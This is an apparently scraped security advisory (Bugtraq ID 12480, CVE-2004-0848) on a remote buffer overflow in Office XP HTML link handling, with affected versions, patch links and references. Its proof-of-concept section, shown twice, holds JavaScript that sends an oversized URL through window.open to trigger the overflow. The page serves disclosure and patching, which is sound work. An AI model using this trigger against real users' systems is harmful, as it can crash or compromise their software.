Microsoft Office XP HTML Link Processing Remote Buffer Overflow Vulnerability
BID:12480
Info
Microsoft Office XP HTML Link Processing Remote Buffer Overflow Vulnerability
| Bugtraq ID: | 12480 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2004-0848 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 08 2005 12:00AM |
| Updated: | Jul 12 2009 10:06AM |
| Credit: | "Rafel Ivgi" <[email protected]> is credited with the discovery of this issue. |
| Vulnerable: |
Microsoft Works Suite 2004 Microsoft Works Suite 2003 Microsoft Works Suite 2002 Microsoft Word 2002 SP3 Microsoft Word 2002 SP2 Microsoft Word 2002 SP1 Microsoft Word 2002 Microsoft Visio 2002 Standard SP2 Microsoft Visio 2002 Professional SP2 Microsoft Visio 2002 SP2 Microsoft Visio 2002 SP1 Microsoft Visio 2002 Microsoft Project 2002 SP1 Microsoft Project 2002 Microsoft PowerPoint 2002 SP3 Microsoft PowerPoint 2002 SP2 Microsoft PowerPoint 2002 SP1 Microsoft PowerPoint 2002 Microsoft Office XP SP3 Microsoft Office XP SP2 Microsoft Office XP SP1 Microsoft Office XP |
| Not Vulnerable: |
Microsoft Office 2003 SP1 Microsoft Office 2003 0 Microsoft Office 2000 SP3 Microsoft Office 2000 SP2 Microsoft Office 2000 SP1 Microsoft Office 2000 |
Discussion
Microsoft Office XP HTML Link Processing Remote Buffer Overflow Vulnerability
A remote buffer overflow vulnerability affects Microsoft Office XP. The problem presents itself when an unsuspecting user follows a malicious HTML link that points to a Office document. A boundary condition error is exposed during this operation that may allow attacker-specified data to corrupt process memory.
An attacker may leverage this issue to execute arbitrary code with the privileges of an unsuspecting user that follows a malicious embedded link.
A remote buffer overflow vulnerability affects Microsoft Office XP. The problem presents itself when an unsuspecting user follows a malicious HTML link that points to a Office document. A boundary condition error is exposed during this operation that may allow attacker-specified data to corrupt process memory.
An attacker may leverage this issue to execute arbitrary code with the privileges of an unsuspecting user that follows a malicious embedded link.
Exploit / POC
Microsoft Office XP HTML Link Processing Remote Buffer Overflow Vulnerability
The following proof of concept has been supplied by Rafel Ivgi:
<Script>
var mylongstring,myjunk;
mylongstring ="";
myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbb";
for(c=1;c<5000;c++)
{
mylongstring = mylongstring + myjunk;
}
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a"+mylongstring);
</script>
The following proof of concept has been supplied by Rafel Ivgi:
<Script>
var mylongstring,myjunk;
mylongstring ="";
myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbb";
for(c=1;c<5000;c++)
{
mylongstring = mylongstring + myjunk;
}
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a"+mylongstring);
</script>
Solution / Fix
Microsoft Office XP HTML Link Processing Remote Buffer Overflow Vulnerability
Solution:
Microsoft has released updates to address this issue.
Microsoft Project 2002 SP1
Microsoft Office XP SP3
Microsoft Works Suite 2003
Microsoft Visio 2002
Microsoft Works Suite 2002
Microsoft Office XP SP2
Microsoft Works Suite 2004
Microsoft Visio 2002 SP2
Microsoft Visio 2002 SP1
Microsoft Project 2002
Solution:
Microsoft has released updates to address this issue.
Microsoft Project 2002 SP1
-
Microsoft Security Update for Project 2002 (KB873355)
http://download.microsoft.com/download/8/0/7/807ada7f-8f3f-4114-8dfd-9 35d55acf82c/project2002-KB873355-FullFile-ENU.EXE
Microsoft Office XP SP3
-
Microsoft Security Update for Office XP (KB873352)
http://www.microsoft.com/downloads/details.aspx?familyid=A0115BF8-5F80 -43E9-BE28-24D344600D69&displaylang=en
Microsoft Works Suite 2003
-
Microsoft Security Update for Office XP (KB873352)
http://www.microsoft.com/downloads/details.aspx?familyid=A0115BF8-5F80 -43E9-BE28-24D344600D69&displaylang=en
Microsoft Visio 2002
-
Microsoft Security Update for Visio 2002 (KB873354)
http://download.microsoft.com/download/f/3/9/f39b9399-4caf-4d78-8375-d e0ea88e5166/Visio2002-KB873354-FullFile-ENU.EXE
Microsoft Works Suite 2002
-
Microsoft DO NOT USE
-
Microsoft Security Update for Office XP (KB873352)
http://www.microsoft.com/downloads/details.aspx?familyid=A0115BF8-5F80 -43E9-BE28-24D344600D69&displaylang=en
Microsoft Office XP SP2
-
Microsoft Security Update for Office XP (KB873352)
http://www.microsoft.com/downloads/details.aspx?familyid=A0115BF8-5F80 -43E9-BE28-24D344600D69&displaylang=en
Microsoft Works Suite 2004
-
Microsoft Security Update for Office XP (KB873352)
http://www.microsoft.com/downloads/details.aspx?familyid=A0115BF8-5F80 -43E9-BE28-24D344600D69&displaylang=en
Microsoft Visio 2002 SP2
-
Microsoft Security Update for Visio 2002 (KB873354)
http://download.microsoft.com/download/f/3/9/f39b9399-4caf-4d78-8375-d e0ea88e5166/Visio2002-KB873354-FullFile-ENU.EXE
Microsoft Visio 2002 SP1
-
Microsoft Security Update for Visio 2002 (KB873354)
http://download.microsoft.com/download/f/3/9/f39b9399-4caf-4d78-8375-d e0ea88e5166/Visio2002-KB873354-FullFile-ENU.EXE
Microsoft Project 2002
-
Microsoft Security Update for Project 2002 (KB873355)
http://download.microsoft.com/download/8/0/7/807ada7f-8f3f-4114-8dfd-9 35d55acf82c/project2002-KB873355-FullFile-ENU.EXE
References
Microsoft Office XP HTML Link Processing Remote Buffer Overflow Vulnerability
References:
References:
- Microsoft Office Product Homepage (Microsoft)
- Microsoft Security Bulletin MS05-005 (Microsoft)
- Finjan Security Advisory: Microsoft Office XP Remote Buffer Overflow Vulnerabili ("Rafel Ivgi"
)